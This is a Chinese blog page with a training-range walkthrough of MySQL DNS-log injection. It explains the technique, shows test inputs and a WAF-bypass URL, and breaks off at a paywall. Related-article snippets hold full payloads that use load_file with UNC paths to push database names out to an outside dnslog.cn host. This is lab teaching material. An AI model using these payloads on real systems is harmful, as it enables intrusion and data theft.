封神台MYSQL 注入 - Dns注入

最新推荐文章于 2022-08-07 21:23:08 发布
最新推荐文章于 2022-08-07 21:23:08 发布
阅读量1.1k 收藏 4
点赞数
分类专栏: Web安全微专业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40941912/article/details/108927737
版权

一、原理

DNSLOG的使用场景:

在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。
对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。
所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。

LOAD_FILE()读取文件的函数

读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。 该文件所有字节可读,但文件内容必须小于max_allowed_packet(限制server接受的数据包大小函数,默认1MB)。 如果该文件不存在或无法读取,因为前面的条件之一不满足,函数返回 NULL。

二、作业

MYSQL 注入 - Dns注入 (Rank: 20)

  1. 首先我们可以随便尝试下是否存在注入:?id=1 and 1=1
    发现被拦截

  2. 要想办法绕过防火墙,试下输入:http://59.63.200.79:8014/index3.php/1.txt?id=1 and 1=2
    如下

最低0.47元/天 解锁文章
炎凰先生
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据库注入学习笔记2---MySQL注入DNS注入
qq_41759633的博客
08-07 252
引:DNS注入并不是对DNS服务器进行注入,而是利用DNS解析的时候会留下的有用的日志,简称:DNS log注入。 条件:有SQL盲注(或时间)注入的站点,可是用sqlmap跑需要频繁请求,最后导致ip被ban。 发现疑似命令注入的洞,但是目标站点不显示,无法确认是不是有漏洞 目标不让信息显示出来,如能发送请求,那么就可以尝试咱这个办法----用DNS log来获取回显(一般为root权限) 首先...
mysql注入dns注入
seek_2022的博客
05-03 1951
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
MYSQL--Dns注入
qq_68233961的博客
08-07 1069
MYSQL--Dns注入
Mysql注入——DNS注入
m0_55854679的博客
02-17 2020
DNSlog【解决繁琐的盲注】介绍 DNS => 域名解析 LOG => 日志 dns-log => 域名解析日志【记录别人来查询域名和ip的对应】 DNSlog使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban,所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 DNS
mysql注入---DNSLOG注入
nini_boom的博客
07-21 562
不一定学习进度速度快,就代表掌控的东西就多。学习的目标在于对于理解的知识深度和广度,速度快会有很多时间学习广度的东西,但在有限广度的情况下,理解的深度才是更重要的,所以在这种情况下,不要在意学习的进度,把握住学习的节奏,向更深处理解。扎下深根的竹子,在疯狂生长的时候才有更多的后备力量。 0x01 DNSLOG注入 当我们遇到了盲注、延时注入时,页面没有具体的返回。 但是盲注、延时注入需要进行大...
神演义--------------------.pdf
03-27
神演义
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
cocos2d-x神榜demo源码
03-03
cocos2d-x引擎开发的游戏源码,注释较为详细,易于初学者学习用。
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神pak工具操作易语言源码-易语言
06-13
神pak工具操作易语言源码
mysql的)DNS注入
weixin_60777183的博客
09-02 231
一、基础知识总结: DNS注入→让盲注变成显错注入 LOAD_FILE() :读取文件的函数 在phpstudy的cmd里用的时候,需要在从其他选项菜单→打开配置文件→mysql-ini的配置文件里加上: secure_file_priv= 配置好后重启,才好使。 举例:select load_file('C\\1.txt') 两个\\原因,其中一个是转义符。 可以写绝对路径,也可以相对路径。 UNC路径: Windows的SMB服务——可以共享文件 load_file 支持UNC路径。 http
神台 dnslog注入
weixin_43836174的博客
08-27 617
靶场地址:http://59.63.200.79:8022/cat/?id=1 第一步 注入点寻找 寻找注入点,初步判断id=1处为注入点 尝试 试用 and 1=1 返回成功 1=2 报错 第二步 初步测试注入 找到注入点试用 order by n 查询 ![](https://nc0.cdn.zkaq.cn/md/6263/bdf6430495304a773942341564db2105_12336.png) 发现可以回显的字符是2为 使用 union select 1,...
神台sql靶场 dns_log 注入
weixin_46578840的博客
06-25 239
前提:目标数据库允许load_file() 1 and 1=1 //正常 1 and 1=2 //页面错误,存在注入 1 and 1=2 union select 1,2 # //回显位为2,由于题目要求用dnslog,那就用联合查询了 构造poyload 1 and (select load_file('//',(concat(select database()),'.xizusd.dnslog.cn/abc'))) 1+and+(select+load_file(concat('//',(select+
17、注入篇--DNS注入MySQL
WX公众号-小白学安全
04-10 835
DNS注入 DNS注入也称DNS带外注入DNSLog注入 DNSDNS(Domain Name System)域名系统,将域名与IP地址相互映射的一个分布式数据库 DNS注入核心是 将盲注变为显错注入 DNS-log ​ DNS服务器的解析记录 注入基础 1、load_file() 读取文件的函数 ​ 读取文件并返回文件内容为字符串 ​ 要使用此函数文件必须位于主服务器上,必须指定完整路径的文件,而且必须有file权限 ​ 该文件所有字节可读,但文件内容必须小于max_allower_packe
mysql dns 注入_SQL注入-DNS注入(二)
weixin_36125719的博客
01-27 181
其实就是盲注的简化版本,不过这种方式确实简单,不需要写py脚本一点点去跑参考文章:0x01、关于DNSlog在Web攻击的利用DNSlog在Web漏洞利用中已经是老生常谈的问题,简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。0x02、常用在哪些情况下SQL注入中的盲注无回显的命令执行无回显的SSRF0x03、Dns...
mysql——DNS注入
qq_45300786的博客
08-09 1665
DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 DNS注入的核心,将盲注转化为显错注入 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 比如 ox.qidao.com => DNS记录了这个请求, 那么我们也可以让mysql也能发出请求,DNS也会记录 ...
MySQL-DNS注入
weixin_45634365的博客
03-03 274
一、DNS注入的原理 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,将盲注变为显错注入 即读取远程共享文件,拼接出函数,进行查询,再拼接到域名中,访问时将访问服务器,记录后查看日志 对于sql盲注,常见的方法是使用二分法一个个猜,但是这样的方法很麻烦,还很容易因为数据请求频繁导致被禁 所以可以将查询到的数据发送给一个URL,利用DNS解析产生的记录日志
dns mysql_DNSlog实现Mysql注入
weixin_32126033的博客
01-18 128
step1:通过DNSlog盲注需要用到load_file()函数。show variables like '%secure%' 查看load_file()可以读取的磁盘。1、当secure_file_priv为空,就可以读取磁盘的目录。2、当secure_file_priv为G:\,就可以读取G盘的文件。3、当secure_file_priv为null,load_file就不能加载文件。在5.7...
16、Mysql - dns注入
songling515010475的专栏
05-22 167
为什么load_file能执行? 因为在mysql配置文件里开启了secure_file_priv服务,导致不对mysql的导入导出不做任何限制。 1.前往dnslog.cn申请一个域名 2.防止被WAF拦截,所以在后面拼接/123.txt?id=123当作参数,因为.txt会被WAF认为txt是不能传参数的,是安全的。申请的域名,前面要加三级域名,后面也要加路径,否则不会生效。 /123.txt?id=123 and load_file(concat('//',(select database
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值